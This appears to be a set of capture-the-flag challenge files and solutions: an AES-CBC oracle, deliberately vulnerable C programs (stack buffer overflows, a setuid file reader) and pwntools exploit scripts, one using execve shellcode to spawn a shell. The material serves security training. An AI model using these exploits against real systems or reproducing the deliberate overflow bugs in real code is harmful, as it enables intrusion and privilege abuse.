wheel barrow で OK
from base64 import b64encode, b64decode
from Crypto.Cipher import AES
from Crypto.Util.Padding import pad, unpad
print("Welcome to the AES-CBC oracle!")
key = open("key", "rb").read()
while True:
print("Do you want to encrypt the flag or decrypt a message?")
print("1. Encrypt the flag")
print("2. Decrypt a message")
choice = input("Your choice: ")
if choice == "1":
cipher = AES.new(key=key, mode=AES.MODE_CBC)
ciphertext = cipher.iv + \\
cipher.encrypt(pad(b"random", cipher.block_size))
print(f"{b64encode(ciphertext).decode()}")
elif choice == "2":
line = input().strip()
data = b64decode(line)
iv, ciphertext = data[:16], data[16:]
cipher = AES.new(key=key, mode=AES.MODE_CBC, iv=iv)
try:
plaintext = unpad(cipher.decrypt(ciphertext),
cipher.block_size).decode('latin1')
except Exception as e:
print("Error!")
continue
if plaintext == "I am an authenticated admin, please give me the flag":
print("Victory! Your flag:")
print(open("flag.txt").read())
else:
print("Unknown command!")
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
void secret()
{
printf("Congratulations! Here is your flag: ");
char *argv[] = {"/bin/cat", "flag.txt", NULL};
char *envp[] = {NULL};
execve("/bin/cat", argv, envp);
}
void vulnerable_function()
{
char buffer[64];
printf("Enter some text: ");
fgets(buffer, 128, stdin);
printf("You entered: %s\\n", buffer);
}
int main()
{
setvbuf(stdout, NULL, _IONBF, 0);
printf("Welcome to the Baby Pwn challenge!\\n");
printf("Address of secret: %p\\n", secret);
vulnerable_function();
printf("Goodbye!\\n");
return 0;
}
from pwn import *
binary = './baby-pwn'
elf = ELF(binary)
secret_address = elf.symbols['secret']
print(f"Secret function address: {hex(secret_address)}")
#p = process(binary)
p = remote('34.162.142.123', 5000)
payload = b"A" * 4*18
payload += p64(secret_address)
p.sendlineafter("Enter some text: ", payload)
flag = p.recvall().decode()
print(flag)
#include <stdio.h>
#include <string.h>
void vulnerable_function()
{
char buffer[64];
printf("Stack address leak: %p\\n", buffer);
printf("Enter some text: ");
fgets(buffer, 128, stdin);
}
int main()
{
setvbuf(stdout, NULL, _IONBF, 0);
printf("Welcome to the baby pwn 2 challenge!\\n");
vulnerable_function();
printf("Goodbye!\\n");
return 0;
}
シェルコード
#!/usr/bin/env python3
from pwn import *
#context.arch = "amd64"
binary = './baby-pwn-2'
elf = ELF(binary)
def main():
gdb.debug
p = gdb.debug("./baby-pwn-2", gdbscript="""
b *vulnerable_function
c
""")
p = process(binary)
p.recvuntil(b"Stack address leak: ")
leaked_addr = int(p.recvline().strip(), 16)
log.info(f"Leaked buffer address: {hex(leaked_addr)}")
ret_addr = leaked_addr
shellcode = b"\\x48\\x31\\xD2\\x48\\x31\\xC0\\x48\\xBB\\x2F\\x2F\\x62\\x69\\x6E\\x2F\\x73\\x68\\x48\\xC1\\xEB\\x08\\x53\\x48\\x89\\xE7\\x50\\x57\\x48\\x89\\xE6\\xB0\\x3B\\x0F\\x05"
payload = shellcode.ljust(72, asm('nop'))
print(hex(ret_addr))
payload += p64(ret_addr)
p.sendline(payload)
p.interactive()
if __name__ == "__main__":
main()
Kim, Sung-Sik
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
int main(int argc, char **argv)
{
if (setuid(0) != 0)
{
perror("Error setting UID");
return EXIT_FAILURE;
}
char *fn = "/home/user/permitted";
char buffer[128];
char f[128];
FILE *fp;
if (!access(fn, R_OK))
{
printf("Enter file to read: ");
fgets(f, sizeof(f), stdin);
f[strcspn(f, "\\n")] = 0;
if (strstr(f, "flag") != NULL)
{
printf("Can't read the 'flag' file.\\n");
return 1;
}
if (strlen(f) == 0)
{
fp = fopen(fn, "r");
}
else
{
fp = fopen(f, "r");
}
fread(buffer, sizeof(char), sizeof(buffer) - 1, fp);
fclose(fp);
printf("%s\\n", buffer);
return 0;
}
else
{
printf("Cannot read file.\\n");
return 1;
}
}